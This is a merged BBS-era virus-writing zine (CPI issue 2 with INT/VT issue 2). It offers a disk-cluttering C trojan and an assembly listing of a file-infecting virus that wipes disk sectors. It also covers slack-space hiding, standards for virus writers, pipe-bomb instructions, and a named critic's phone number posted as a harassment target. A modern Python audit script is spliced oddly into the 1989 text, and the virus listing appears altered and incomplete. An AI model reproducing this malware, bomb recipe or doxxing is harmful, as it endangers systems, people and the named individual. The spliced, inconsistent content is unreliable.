[2.1]

C O R R U P T E D   P R O G R A M M I N G   I N T E R N A T I O N A L

presents:

        Virili And Trojan Horses
        A Protagonist's Point Of View
        Issue #2

DISCLAIMER: All of the information contained in this newsletter reflects the thoughts and ideas of the authors, not their actions. The sole purpose of this document is to educate and spread information. Any illegal or illicit action is not endorsed by the authors or CPI. The authors and CPI are not responsible for any information which may present itself as old or misinterpreted, or for actions by the reader. Remember, "Just Say No!"

CPI #2                 Issue 2, Volume 1                 Release Date: July 27, 1989

Introduction To CPI#2
---------------------

Well, here is the "long awaited" second issue of CPI, A Protagonist's Point of View. This issue should prove a bit interesting, I dunno, but at least entertaining for the time it takes to read. Enjoy the information and don't forget the disclaimer. Oh yes, if you have some interesting articles or an application to send us, just see the BBS list at the end of this document. Thanx. All applications and information will be voted on through the CPI Inner Circle. Hope you enjoy this issue as much as we enjoyed typing it... hehe...
Until our next issue, (which may be whenever), good-bye. Doctor Dissector Table of Contents ----------------- Part Title Author ----------------------------------------------------------------------------- 2.1 Title Page, Introduction, & TOC....................... Doctor Dissector 2.2 Another Explanation Of Virili And Trojans............. Acid Phreak 2.3 V-IDEA-1.............................................. Ashton Darkside 2.4 V-IDEA-2.............................................. Ashton Darkside 2.5 The Generic Virus..................................... Doctor Dissector 2.6 Aids.................................................. Doctor Dissector 2.7 Batch File Virus...................................... PHUN 3.2 2.8 Basic Virus......................................... PHUN 3.2 2.9 The Alemeda Virus..................................... PHUN 4.3 2.10 Virili In The News.................................... Various Sources 2.11 Application For CPI................................... CPI Inner Circle (CPI Node Phone #Ys Are In 2.11) ========================================================================= Subject: INTVT Issue 2 1/1 To: tk0jut2 Original_To: BITNET%"tk0jut2@niu" The International Network of Thieves 2/16/91 Virus and Trojan Oriented Volume No. 2 Welcome back! Hey guys, (and gals I hope!) error in last issue, the date was incorrect. The actual date of INT/VT1.TXT should have been 1/29/91. Sorry dudez, had some people think it was a year old... Ok, geez, already issue two? You people have been waiting for it haven't you? GOOD! VERY IMPORTANT NEWS! -------------------- Gene Dunn, (handle is Unimax) a PD'er and Virus hater is on the prowl. He has called The Edge of Destruction(817-473-3621) many times, and actually came over to MY house once. He is threatening to take me to court. He got a virus on his PD BBS and wants The EoD shut down because of its virus support, and because it is the home of INT/VT!!!! This man is a mad man. I won't take the BBS down! 
But if the court says so, oh well! HEY! THIS GUY IS THREATENING THE HOME OF INT/VT!!! His name again is GENE DUNN,(Actually Eugene I believe) and the number to his BBS is 817-834-0143. What you do with that info is up to you. DISCLAIMER ---------- The writers of this article, nor the sysops of The EoD, are responsible for what you do with the information found/discussed here. You the user/reader of this are soley responsible for what you do with this information, as it is provided for programming research only, and not for ANY illegal uses. HOW WAS LESSON ONE? ------------------- How did everyone do on your first lesson? Did you try it? On what? I'd really enjoy it if you'd call The EoD and leave me mail about it. Also, if you plan to continue with these issues and do the examples, I would recommend that you get a copy of flushot(also available on The EoD), so as to watch the virii/trojans as they work. INT/VT APPLICATION ------------------ In this issue of INT/VT we will be including an application for joining our association. Please fill it out and upload it to the SYSOP UPLOADS on The Edge of Destruction BBS, 817-473-3621. You will be notified via E-Mail of your status as a member. Thank You. SOME INFORMATION ABOUT DEBUG ---------------------------- Since not everyone has Turbo Debugger, sNOOp, or some of the nicer de-buggers, we're going to stick with using the DOS debug. Those of you who already write virii and or are familiar with debug, you may want to skip this section and pick up later down in the article. This is for the beginners to debug. Here are some of the basic listing of commands for debug: COMMAND / USAGE / COMMENTS A A[address] A0100:0100 Start assembling at address 0100:0100 In most cases A0100 is all that is neccessary. 
C   C [range address]    C100,1FF 300   Compare a portion of memory
D   D [range]            D0100          Display the contents of memory at 0100
E   E [address]          E0100          Start entering byte values at 0100
F   F [range list]       F0100 L 100    Fill 100 bytes
G   G [address]          G              Run the current program
H   H [values]           H 100 108      Add and subtract hex numbers
I   I [value]            I2F8           Input one byte from the specified port
L   L [address]                         Load
M   M [range address]                   Move blocks of memory
N   N [name]             N Joe.exe      Name a file
O   O [value byte]                      Send the specified byte to an output port
Q   Q                                   Terminate Debug
R   R [register]                        Show a register and edit it
S   S [range list]                      Search the specified range for bytes
T   T                                   Trace through the program
U   U [address]          U0100          Unassemble at the given address
W   W [amt. of bytes]                   Save to disk

While these are not explained in great detail, it is not necessary to do so at this time; as we use them, they will be. I recommend you go to the bookstore and purchase Peter Norton's Guide to Assembly Language. It will run you about $25.00; then download MASM 5.0 from The EoD. MASM stands for Microsoft Assembler, for those of you who are new to this. Also available are Turbo C and Turbo C++ v2.00 and Turbo Pascal v6.00. Feel free to call and D/L these files. Reading Peter Norton's book will make what you find here much easier. Also, it will teach you how to program in assembler, something we DO NOT plan to do here, but to sharpen your knowledge, or HELP you learn it. Something else you need is the BOOK of INT's, soon to be available on The EoD.

LESSON 2, ANOTHER SIMPLE TROJAN IN C
------------------------------------

Our last trojan was in ASM; this one is in C, and known as Crazy. What it does is make tons of directories on someone's HD. You say, "ooo, big deal." Exactly, it's a VERY BIG deal. In DOS, you can not remove more than one DIR at a time. Can you imagine removing all of those DIR's by hand? It could take weeks, months, or years.

/* Thanks to Ninja Wala of SUP for writing such a niftey trojan!
*/ #include #include /* Include Files */ #include /* Used by C to make life easier */ main() { int i,j; /* Names I and J as variables */ char tmp[20]; char far *ptr; for (i=0;i<=50;i++){ /* random loop to make dirs */ srand(rand()); ptr = itoa(rand(),tmp,10); mkdir ( ptr ); /* makes the DIR */ chdir ( ptr ); for (j=0;j<=50;j++){ ptr = itoa(rand(),tmp,10); mkdir( ptr ); } chdir ("\\"); } } While we are not going deep into how this works, we give you the source so you can compile it and have some real nice fun killing an HD. If you would like the compiled version (EXE version) you can get it off of many BBS's including The EoD. NEXT ISSUE ---------- In the next issue we will actually look at the inner workings of a virus. Rather than a trojan. As to which virus, we can not be sure at this time. Also, we will start our virus description and fake virus section. JUST FOR ANARCHISTS - CO2 Cartidge Bomb! ---------------------------------------- Ok dudez, here is a nice mailbox or toilet bomb. Let the air out of the CO2 cartridge, I don't care how. Use a nail, knife, screwdriver, or whatever else to make the hole a bit bigger. Fill it with gunpowder and pack it down by tapping the bottom of the CO2 cartridge on a hard surface. Insert a fuse, (I recommend a good waterproof cannon fuse, but a firecracker fuse will work if its all you can find.) Use something that seals real hard and tight. I have used silicon before, but I think you cand find something that will try much harder if you look. Find your destination. Light it. RUN! FAST! If it blows with you near it. Better be a hospital near. I flushed one down a toilet at a Fina Station and the Toilet CRACKED and started leaking. Not to mention water was everywhere! Dripping from the ceiling and the walls. CALL OUR HOME WORLD ------------------- Call our HQ BBS: The Edge of Destruction - 817-473-3621 APOLOGY ------- We realize that this issue was not as informative as some of you were hoping. 
The reason for this is the problem of Gene Dunn. We have had little or no time to donate to INT/VT due to his insanity. We hope to have a MUCH, MUCH more interesting issue as Issue 3, which you should see in about 1-2 weeks.

[2.2]

Explanation of Viruses and Trojan Horses
----------------------------------------
Written by Acid Phreak

Like its biological counterpart, a computer virus is an agent of infection, insinuating itself into a program or disk and forcing its host to replicate the virus code. Hackers fascinated by the concept of "living" code wrote the first viruses as projects or as pranks. In the past few years, however, a different kind of virus has become common, one that lives up to an earlier meaning of the word: in Latin, virus means poison. These new viruses incorporate features of another type of insidious program called a Trojan horse. Such a program masquerades as a useful utility or product but wreaks havoc on your system when you run it. It may erase a few files, format your disk, steal secrets--anything software can do, a Trojan horse can do. A malicious virus can do all this, then attempt to replicate itself and infect other systems.

The growing media coverage of the virus concept, and of specific viruses, has promoted the development of a new type of software. Antivirus programs, vaccines--they go by many names, but their purpose is to protect from virus attack. At present there are more antivirus programs than known viruses (not for long).

Some experts quibble about exactly what a virus is. The most widely known viruses, the IBM Xmas virus and the recent Internet virus, are not viruses according to some experts because they do not infect other programs. Others argue that every Trojan horse is a virus--one that depends completely on people to spread it.

How They Reproduce:
-------------------

Viruses can't travel without people.
Your PC will not become infected unless someone runs an infected program on it, whether accidentally or on purpose. PCs are different from mainframe networks in this way--the mainframe Internet virus spread by transmitting itself to other systems and ordering them to execute it as a program. That kind of active transmission is not possible on a PC.

Virus code reproduces by changing something in your system. Some viruses strike COMMAND.COM or the hidden system files. Others, like the notorious Pakistani-Brain virus, modify the boot sector of floppy disks. Still others attach themselves to any .COM or .EXE file. In truth, any file on your system that can be executed--whether it's a program, a device driver, an overlay, or even a batch file--could be the target of a virus.

When an infected program runs, the virus code usually executes first and then transfers control to the original program. The virus may immediately infect other programs, or it may load itself into RAM and continue spreading. If the virus can infect a file that will be used on another system, it has succeeded.

What They Can Do:
-----------------

Viruses go through two phases: a replication phase and an action phase. The action doesn't happen until a certain event occurs--perhaps reaching a special date or running the virus a certain number of times. It wouldn't make sense for a virus to damage your system the first time it ran; it needs some time to grow and spread first.

The most vulnerable spot for a virus attack is your hard disk's file allocation table (FAT). This table tells DOS where every file's data resides on the disk. Without the FAT, the data's still there but DOS can't find it. A virus could also perform a low-level format on some or all the tracks of your hard disk, erase all files, or change the CMOS memory on AT-class computers so that they don't recognize the hard disk. Most of the dangers involve data only, but it's even possible to burn out a monochrome monitor with the right code.
Some virus assaults are quite subtle. One known virus finds four consecutive digits on the screen and switches two. Let's hope you're not balancing the company's books when this one hits. Others slow down system operations or introduce serious errors.

[2.3]

-------------------------------------------------------------------------------
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------

C O R R U P T E D   P R O G R A M M E R S   I N T E R N A T I O N A L
* * * present * * *

"Ok, I've written the virus, now where the hell do I put it?"
By Ashton Darkside (DUNE / SATAN / CPI)

*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES ONLY! The author does NOT condone the use of this information in any manner that would be illegal or harmful. The fact that the author knows and spreads this information in no way suggests that he uses it. The author also accepts no responsibility for the malicious use of this information by anyone who reads it! Remember, we may talk alot, but we "just say no" to doing it.
*******************************************************************************

Ok, wow! You've just invented the most incredibly nifty virus. It slices, it dices, it squishes, it mushes (sorry Berke Breathed) people's data! But the only problem is, if you go around infecting every damn file, some cute software company is going to start putting in procedures that checksum their warez each time they run, which will make life for your infecting virus a total bitch.
Or somebodyYs going to come up with an incredibly nifty vaccination util that will wipe it out. Because, i mean, hey, when disk space starts vanishing suddenly in 500K chunks people tend to notice. Especially people like me that rarely have more than 4096 bytes free on their HD anyway. Ok. So youYre saying owow, so what, I can make mine fool-proof@, etc, etc. But wait! ThereYs no need to go around wasting your precious time when the answer is right there in front of you! Think about it, you could be putting that time into writing better and more inovative viruses, or you could be worring about keeping the file size, the date & time, and the attributes the same. With this system, you only need to infect one file, preferably one thatYs NOT a system file, but something that will get run alot, and will be able to load your nifty virus on a daily basis. This system also doesnYt take up any disk space, other than the loader. And the loader could conceivably be under 16 bytes (damn near undetectable). First of all, you need to know what programs to infect. Now, everybody knows about using COMMAND.COM and thatYs unoriginal anyway, when there are other programs people run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or WordPerfect; you get the idea. Better still are dos commands like Format, Link or even compression utilities. But you get the point. Besides, whoYs going to miss 16 bytes, right? Now, the good part: where to put the damn thing. One note to the programmer: This could get tricky if your virus is over 2k or isnYt written in Assembly, but the size problem is easy enough, it would be a simple thing to break your virus into parts and have the parts load each other into the system so that you do eventually get the whole thing. The only problem with using languages besides assembly is that itYs hard to break them up into 2k segments. 
If you want to infect floppys, or smaller disks, youYd be best off to break your file into 512 byte segments, since theyYre easier to hide. But, hey, in assembly, you can generate pretty small programs that do alot, tho. Ok, by now youYve probably figured out that weYre talking about the part of the disk called Zthe slackY. Every disk that your computer uses is divided up into parts called sectors, which are (in almost all cases) 512 bytes. But in larger disks, and even in floppies, keeping track of every single sector would be a complete bitch. So the sectors are bunched together into groups called ZclustersY. On floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard disks, theyYre typically 4096 bytes, or eight sectors. Now think about it, you have programs on your hard disk, and what are the odds that they will have sizes that always end up in increments of 4096? If IYve lost you, think of it this way: the file takes up a bunch of clusters, but in the last cluster it uses, there is usually some ZslackY, or space that isnYt used by the file. This space is between where the actual file ends and where the actual cluster ends. So, potentially, you can have up to 4095 bytes of ZslackY on a file on a hard disk, or 1023 bytes of ZslackY on a floppy. In fact, right now, run the Norton program ZFS /S /TY command from your root directory, and subtract the total size of the files from the total disk space used. ThatYs how much ZslackY space is on your disk (a hell of alot, even on a floppy). To use the slack, all you need to do is to find a chunk of slack big enough to fit your virus (or a segment of your virus) and use direct disk access (INT 13) to put your virus there. There is one minor problem with this. Any disk write to that cluster will overwrite the slack with ZgarbageY from memory. This is because of the way DOS manages itYs disk I/O and it canYt be fixed without alot of hassles. But, there is a way around even this. 
And it involves a popular (abeit outdated and usually ineffectual) form of virus protection called the READ-ONLY flag. This flag is the greatest friend of this type of virus. Because if the file is not written to, the last cluster is not written to, and voila! Your virus is safe >from mischivious accidents. And since the R-O flag doesnYt affect INT 13 disk I/O, it wonYt be in your way. Also, check for programs with the SYSTEM flag set because that has the same Read-only effect (even tho I havenYt seen it written, itYs true that if the file is designated system, DOS treats it as read-only, whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM in MS-DOS (not PC-DOS, it uses different files, or so I am told; IYve been too lazy to find out myself) or a protected (!) COMMAND.COM file in either type of DOS would be ideal for this. All you have to do is then insert your loader into some innocent-looking file, and you are in business. All your loader has to do is read the sector into the highest part of memory, and do a far call to it. Your virus cann then go about waiting for floppy disks to infect, and place loaders on any available executable file on the disk. Sound pretty neet? It is! Anyway, have fun, and be sure to upload your virus, along with a README file on how it works to CPI Headquarters so we can check it out! And remember: donYt target P/H/P boards (thatYs Phreak/Hack/Pirate boards) with ANY virus. Even if the Sysop is a leech and you want to shove his balls down his throat. Because if all the PHP boards go down (especially members of CPI), who the hell can you go to for all these nifty virus ideas? And besides, itYs betraying your own people, which is uncool even if you are an anarchist. So, target uncool PD boards, or your bossYs computer or whatever, but donYt attack your friends. Other than that, have phun, and phuck it up! 
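Seen from the defender's side, the slack the article describes is straightforward to measure and to audit. What follows is an added example, not code from the article or from CPI: it models a FAT-style volume as an in-memory byte image using the 4096-byte hard-disk cluster size quoted above, computes each file's slack, and reports any file whose slack region holds non-zero bytes, which is what an integrity or forensic sweep of a volume looks for. The image, the file table and the file names are constructed sample data, and files are assumed to be allocated contiguously for simplicity.

```python
"""Slack-space audit: added example, not part of the original article.

A volume is modelled as a byte image divided into fixed-size clusters.
The constructed file table maps a name to (first cluster, size in bytes).
"""

CLUSTER_SIZE = 4096  # hard-disk cluster size quoted in the article


def slack_bytes(file_size, cluster_size=CLUSTER_SIZE):
    """Unused bytes between end-of-file and the end of its last cluster."""
    if file_size == 0:
        return 0  # a zero-length file owns no cluster, so it has no slack
    return (-file_size) % cluster_size


def clusters_used(file_size, cluster_size=CLUSTER_SIZE):
    """Number of clusters a file of this size occupies (ceiling division)."""
    return (file_size + cluster_size - 1) // cluster_size


def slack_region(image, first_cluster, file_size, cluster_size=CLUSTER_SIZE):
    """The slack bytes of a file stored contiguously from first_cluster."""
    start = first_cluster * cluster_size
    end_of_file = start + file_size
    end_of_last_cluster = start + clusters_used(file_size, cluster_size) * cluster_size
    return image[end_of_file:end_of_last_cluster]


def inspect_slack(image, file_table, cluster_size=CLUSTER_SIZE):
    """Map name -> (slack length, non-zero byte count) for every file whose
    slack is not zero-filled. A freshly formatted volume reports nothing;
    content after end-of-file is what a forensic review should look at."""
    findings = {}
    for name, (first_cluster, size) in file_table.items():
        region = slack_region(image, first_cluster, size, cluster_size)
        nonzero = sum(1 for b in region if b)
        if nonzero:
            findings[name] = (len(region), nonzero)
    return findings


def build_sample_image():
    """Constructed 8-cluster image with three files:
    CLEAN.COM  - 5000 bytes, slack zero-filled
    HIDDEN.COM - 7000 bytes, 600 non-zero bytes sitting in its slack
    FULL.COM   - exactly one cluster, so no slack at all"""
    image = bytearray(8 * CLUSTER_SIZE)
    table = {}
    image[0:5000] = b"A" * 5000
    table["CLEAN.COM"] = (0, 5000)
    start = 2 * CLUSTER_SIZE
    image[start:start + 7000] = b"B" * 7000
    image[start + 7000:start + 7600] = b"\x90" * 600  # constructed stand-in for stored content
    table["HIDDEN.COM"] = (2, 7000)
    start = 4 * CLUSTER_SIZE
    image[start:start + CLUSTER_SIZE] = b"C" * CLUSTER_SIZE
    table["FULL.COM"] = (4, CLUSTER_SIZE)
    return bytes(image), table


if __name__ == "__main__":
    img, tbl = build_sample_image()
    for name, (first, size) in tbl.items():
        print(f"{name}: {size} bytes, {slack_bytes(size)} bytes of slack")
    print("slack with content:", inspect_slack(img, tbl))
```

Against a real volume the same logic runs over a raw image of the partition, with each file's cluster chain taken from the FAT instead of the contiguous table assumed here. The article's own observation that DOS never rewrites the last cluster of a read-only file is the reason such content persists, and therefore the reason read-only and system-flagged executables are the first files worth auditing.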
Ashton Darkside Dallas Underground Network Exchange (DUNE) Software And Telecom Applicaitons Network (SATAN) Corrupted Programmers International (CPI) PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk). Call these boards because the sysops are cool: Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader) System: Utopia (SATAN HQ) Sysop: RobbinY Hood (SATAN leader) The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader) D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader) The Jolly BardsmenYs Pub & Tavern The Sierra Crib The Phrozen Phorest Knight ShadowYs Grotto And if I forgot your board, sorry, but donYt send me E-mail bitching about it! Subject: CPI Issue 2 4/11 To: tk0jut2 Original_To: BITNET%"tk0jut2@niu" [2.4] ------------------------------------------------------------------------------- ______ ________ ___________ / ____ \ | ____ \ |____ ____| | / \_| | | \ | | | | | | |_____| | | | | | | ______/ | | | | _ | | | | | \____/ | /\ | | /\ ____| |____ /\ \______/ \/ |_| \/ |___________| \/ oWe ainYt the phucking Salvation Army.@ ------------------------------------------------------------------------------- C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L * * * present * * * CPI Virus Standards - Protect yourself and your friends By Ashton Darkside (DUNE / SATAN / CPI) ******************************************************************************* DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES ONLY! The author does NOT condone the use of this information in any manner that would be illegal or harmful. The fact that the author knows and spreads this information in no way suggests that he uses it. The author also accepts no responsibility for the malicious use of this information by anyone who reads it! Remember, we may talk alot, but we ojust say no@ to doing it. 
******************************************************************************* One of the main problems with viruses is that once you set one loose, it is no longer under your control. I propose to stop this by introducing some standards of virus writing that will enable them to be deactivated whenever they enter a ZfriendlyY (CPI) system. In the long run, even the author of the virus is not immune to being attacked. The following are what I have termed the CPI standards for writing viruses. They will allow a virus to easily check any system they are being run on for a type of Zidentity badgeY. If it is found, the virus will not infect the system it is being run on. The other standards are mostly written around this. CPI Standards for writing viruses - 1 - The virus will have an Zactive periodY and an Zinactive periodY. The active periods will be no more than one year in length (to make it more difficult to discover the virus). You may release different versions of your virus with different Zactive periodsY. It is not recommended that your virus deactivate itself after the set active period, as this would enable people to deactivate viruses by using their computer with the date set to 2069 or something. It is also required that activation periods begin on January 1 and end on December 31. This will coincide with the changing identity codes. 2 - The virus will check for an identity code by executing Interrrupt 12h with the following register settings: AX - 4350, BX - 4920, CX - AB46, DX - 554E. If the system is friendly, then a pointer will be returned in CX:DX to an ASCIIZ (0-terminated) string which will have different contents in different years. The codes are not to be included in any text file, and should only be given through E-mail on CPI affiliated systems. You can always ask me by sending me mail at The Andromeda Strain BBS. 
If a system is detected as friendly, the virus will not attempt to infect or damage it, but it is ok to display a little greeting message about how lucky the user was. 3 - We very much encourage you to upload your virus, along with a breif description on the workings into the CPI section at The Andromeda Strain BBS. Only CPI members will know about your virus. This is so that CPI members can share techniques and it also allows us to verify that the identity check works. If we see any improvements that could be made, such as ways to streamline code, better ways of spreading, etc. we will inform you so that you can make the changes if you wish. 4 - It is also suggested that you use ADS standard for virus storage on infected disks. This meathod uses disk slack space for storage and is more thoroughly described in a previous text file by me. I think that this is the most effective and invisible way to store viruli. 5 - A list of CPI-Standard viruli will be avaliable at all times from The Andromeda Strain BBS, to CPI users. Identity strings will also be available to anyone in CPI, or anyone who uploads source code to a virus which is 100% complete except for the Identity string (it must be written to CPI-Standards). Non-CPI members who do this will be more seriously considered for membership in CPI. Ashton Darkside Dallas Underground Network Exchange (DUNE) Software And Telecom Applications Network (SATAN) Corrupted Programmers International (CPI) PS: This file (by itself) has approx 2.5k of slack. Subject: CPI Issue 2 5/11 To: tk0jut2 Original_To: BITNET%"tk0jut2@niu" ;============================================================================= ; ; C*P*I ; ; CORRUPTED PROGRAMMING INTERNATIONAL ; ----------------------------------- ; p r e s e n t s ; ; T H E ; _ _ ; (g) GENERIC VIRUS (g) ; ^ ^ ; ; ; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF ; CODE IN AND MAKES EACH A VIRUS. 
HOWEVER, WHEN IT MODIFIES EXE FILES, IT ; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR oPROGRAM TO BIG TO ; FIT IN MEMORY@ THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. ; ; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON ; THE DISK. HAVE PHUN WITH THIS ONE. ; ; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE ; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. ; ; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE ; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF ; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR ; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. ; ; DOCTOR DISSECTOR ; CPI ASSOCIATES ; ;============================================================================= MAIN: NOP ;| Marker bytes that identify this program NOP ;| as infected/a virus NOP ;| MOV AX,00 ;| Initialize the pointers MOV ES:[POINTER],AX ;| MOV ES:[COUNTER],AX ;| MOV ES:[DISKS B],AL ;| MOV AH,19 ;| Get the selected drive (dir?) INT 21 ;| MOV CS:DRIVE,AL ;| Get current path (save drive) MOV AH,47 ;| (dir?) MOV DH,0 ;| ADD AL,1 ;| MOV DL,AL ;| (in actual drive) LEA SI,CS:OLD_PATH ;| INT 21 ;| MOV AH,0E ;| Find # of drives MOV DL,0 ;| INT 21 ;| CMP AL,01 ;| (Check if only one drive) JNZ HUPS3 ;| (If not one drive, go the HUPS3) MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive LEA BX,SEARCH_ORDER ;| ADD BX,AX ;| ADD BX,0001 ;| MOV CS:POINTER,BX ;| CLC ;| CHANGE_DISK: ;| Carry is set if no more .COM files are JNC NO_NAME_CHANGE ;| found. 
                                 ; From here, .EXE files will be renamed to .COM, but this
                                 ; causes the error message "Program too large to fit in
                                 ; memory" when larger infected programs are started.
                                 ; If neither .COM nor .EXE files can be found, random
                                 ; sectors on the disk are overwritten, depending on the
                                 ; system time in milliseconds. This is the moment of
                                 ; complete "infection" of a storage medium: the virus can
                                 ; find nothing more to infect and starts its destruction.
        MOV AH,17                ; (change .EXE to .COM)
        LEA DX,CS:MASKE_EXE
        INT 21
        CMP AL,0FF               ; (check if an .EXE is found)
        JNZ NO_NAME_CHANGE
        MOV AH,2CH               ; (get system time)
        INT 21
        MOV BX,CS:POINTER
        MOV AL,CS:[BX]
        MOV BX,DX
        MOV CX,2
        MOV DH,0
        INT 26                   ; (write crap on disk)

                                 ; Check if the end of the search order table has been
                                 ; reached. If so, end.
NO_NAME_CHANGE:
        MOV BX,CS:POINTER
        DEC BX
        MOV CS:POINTER,BX
        MOV DL,CS:[BX]
        CMP DL,0FF
        JNZ HUPS2
        JMP HOPS

                                 ; Get a new drive from the search order table and select
                                 ; it, beginning with the root dir.
HUPS2:
        MOV AH,0E                ; (change drive)
        INT 21
        MOV AH,3B                ; (change path)
        LEA DX,PATH
        INT 21
        JMP FIND_FIRST_FILE

                                 ; Starting from the root, search for the first subdir.
                                 ; First, convert all .EXE files to .COM in the old
                                 ; directory.
FIND_FIRST_SUBDIR:
        MOV AH,17                ; (change .exe to .com)
        LEA DX,CS:MASKE_EXE
        INT 21
        MOV AH,3B                ; (use root directory)
        LEA DX,PATH
        INT 21
        MOV AH,04E               ; (search for first subdirectory)
        MOV CX,00010001B         ; (dir mask)
        LEA DX,MASKE_DIR
        INT 21
        JC CHANGE_DISK
        MOV BX,CS:COUNTER
        INC BX
        DEC BX
        JZ USE_NEXT_SUBDIR

                                 ; Search for the next sub-dir; if no more are found,
                                 ; the drive will be changed.
FIND_NEXT_SUBDIR:
        MOV AH,4FH               ; (search for next subdir)
        INT 21
        JC CHANGE_DISK
        DEC BX
        JNZ FIND_NEXT_SUBDIR

                                 ; Select the found directory.
USE_NEXT_SUBDIR:
        MOV AH,2FH               ; (get dta address)
        INT 21
        ADD BX,1CH
        MOV ES:[BX],W'\'         ; (address of name in dta)
        INC BX
        PUSH DS
        MOV AX,ES
        MOV DS,AX
        MOV DX,BX
        MOV AH,3B                ; (change path)
        INT 21
        POP DS
        MOV BX,CS:COUNTER
        INC BX
        MOV CS:COUNTER,BX

                                 ; Find the first .COM file in the current dir. If there
                                 ; are none, search the next directory.
FIND_FIRST_FILE:
        MOV AH,04E               ; (search for first)
        MOV CX,00000001B         ; (mask)
        LEA DX,MASKE_COM
        INT 21
        JC FIND_FIRST_SUBDIR
        JMP CHECK_IF_ILL

                                 ; If the program is ill (infected), search for another.
FIND_NEXT_FILE:
        MOV AH,4FH               ; (search for next)
        INT 21
        JC FIND_FIRST_SUBDIR

                                 ; Check if already infected by the virus.
CHECK_IF_ILL:
        MOV AH,3D                ; (open channel)
        MOV AL,02                ; (read/write)
        MOV DX,9EH               ; (address of name in dta)
        INT 21
        MOV BX,AX                ; (save channel)
        MOV AH,3FH               ; (read file)
        MOV CH,BUFLEN
        MOV DX,BUFFER            ; (write in buffer)
        INT 21
        MOV AH,3EH               ; (close file)
        INT 21
        MOV BX,CS:[BUFFER]       ; (look for three NOPs)
        CMP BX,9090
        JZ FIND_NEXT_FILE

                                 ; This section bypasses the MS/PC DOS write protection
                                 ; by clearing the read-only attribute of the file.
        MOV AH,43                ; (get attributes)
        MOV AL,0
        MOV DX,9EH               ; (address of name in dta)
        INT 21
        MOV AH,43                ; (write enable)
        MOV AL,01
        AND CX,11111110B
        INT 21

                                 ; Open the file for read/write access.
        MOV AH,3D                ; (open channel)
        MOV AL,02                ; (read/write)
        MOV DX,9EH               ; (address of name in dta)
        INT 21
        MOV BX,AX                ; (channel)

                                 ; Read the date entry of the program and save it for
                                 ; future use.
        MOV AH,57                ; (get date)
        MOV AL,0
        INT 21
        PUSH CX                  ; (save date)
        PUSH DX

                                 ; The jump located at 0100h in the program will be
                                 ; saved for future use.
        MOV DX,CS:[CONTA]        ; (save old jmp)
        MOV CS:[JMPBUF],DX
        MOV DX,CS:[BUFFER+1]     ; (save new jump)
        LEA CX,CONT-100
        SUB DX,CX
        MOV CS:[CONTA],DX

                                 ; The virus now copies itself to the start of the file.
        MOV AH,57                ; (write date)
        MOV AL,1
        POP DX
        POP CX                   ; (restore date)
        INT 21
        MOV AH,3EH               ; (close file)
        INT 21

                                 ; Restore the old jump address. The virus restores at
                                 ; address CONTA the jump which was at the start of the
                                 ; program. This is done to preserve the executability
                                 ; of the host program as much as possible. After
                                 ; saving, it still works with the jump address in the
                                 ; virus. The jump address in the virus differs from
                                 ; the jump address in memory.
        MOV DX,CS:[JMPBUF]
        MOV CS:[CONTA],DX
HOPS:
        NOP
        CALL USE_OLD

                                 ; Continue with the host program.
CONT    DB 0E9                   ; (make jump)
CONTA   DW 0
        MOV AH,00
        INT 21

                                 ; Reactivate the drive and the path that were selected
                                 ; at the start of the program.
USE_OLD:
        MOV AH,0E                ; (use old drive)
        MOV DL,CS:DRIVE
        INT 21
        MOV AH,3B                ; (use old path)
        LEA DX,OLD_PATH-1        ; (get old path and backslash)
        INT 21
        RET

SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
POINTER  DW 0000                 ; (pointer f. search order)
COUNTER  DW 0000                 ; (counter f. nth. search)
DISKS    DB 0                    ; (number of disks)
MASKE_COM DB '*.COM',00          ; (search for com files)
MASKE_DIR DB '*',00              ; (search for dirs)
MASKE_EXE DB 0FF,0,0,0,0,0,00111111B
         DB 0,'????????EXE',0,0,0,0
         DB 0,'????????COM',0
MASKE_ALL DB 0FF,0,0,0,0,0,00111111B
         DB 0,'???????????',0,0,0,0
         DB 0,'????????COM',0
BUFFER   EQU 0E00                ; (a safe place)
BUFLEN   EQU 208H                ; Length of virus. Modify this accordingly
                                 ; if you modify this source. Be careful,
                                 ; for this may change!
JMPBUF   EQU BUFFER+BUFLEN       ; (a safe place for jmp)
PATH     DB '\',0                ; (first place)
DRIVE    DB 0                    ; (actual drive)
BACK_SLASH DB '\'
OLD_PATH DB 32 DUP (?)
                                 ; (old path)

Subject: CPI Issue 2 6/11
To: tk0jut2
Original_To: BITNET%"tk0jut2@niu"

[2.6]

CORRUPTED PROGRAMMING INTERNATIONAL PRESENTS: AIDS
A NEW AND IMPROVED VIRUS FOR PC/MS DOS MACHINES
CREATED BY: DOCTOR DISSECTOR
FILE INTENDED FOR EDUCATIONAL USE ONLY. AUTHOR NOT RESPONSIBLE FOR READERS. DOES NOT ENDORSE ANY ILLEGAL ACTIVITIES.

